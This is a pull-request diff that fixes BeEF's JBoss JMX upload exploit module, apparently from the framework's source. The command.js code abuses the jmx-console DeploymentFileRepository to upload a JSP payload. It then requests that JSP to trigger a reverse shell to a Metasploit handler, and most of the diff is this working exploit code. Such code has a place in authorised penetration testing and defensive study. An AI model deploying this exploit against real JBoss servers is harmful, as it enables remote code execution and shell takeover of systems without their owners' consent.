Merge pull request #746 from bmantra/master

fix for jboss exploit

modules/exploits/jboss_jmx_upload_exploit/command.js

@@ -43,11 +43,11 @@ beef.execute(function() {
     uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
 
     /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
-	beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
-         if(response.status_code == "success"){
+	beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){
+         if(response.status_code == 200){
              function triggerReverseConn(){
-                beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
-                    if(response.status_code == "success"){
+                beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){
+                    if(response.status_code == 200){
                          if(payloadType == "reverse"){
                              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
                          }else{
@@ -64,4 +64,4 @@ beef.execute(function() {
              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
          }
     });
-});
+});

modules/exploits/jboss_jmx_upload_exploit/config.yaml

@@ -23,3 +23,4 @@ beef:
             authors: ["antisnatchor", "l33tb0y"]
             target:
                 working: ["ALL"]
+                not_working: "O"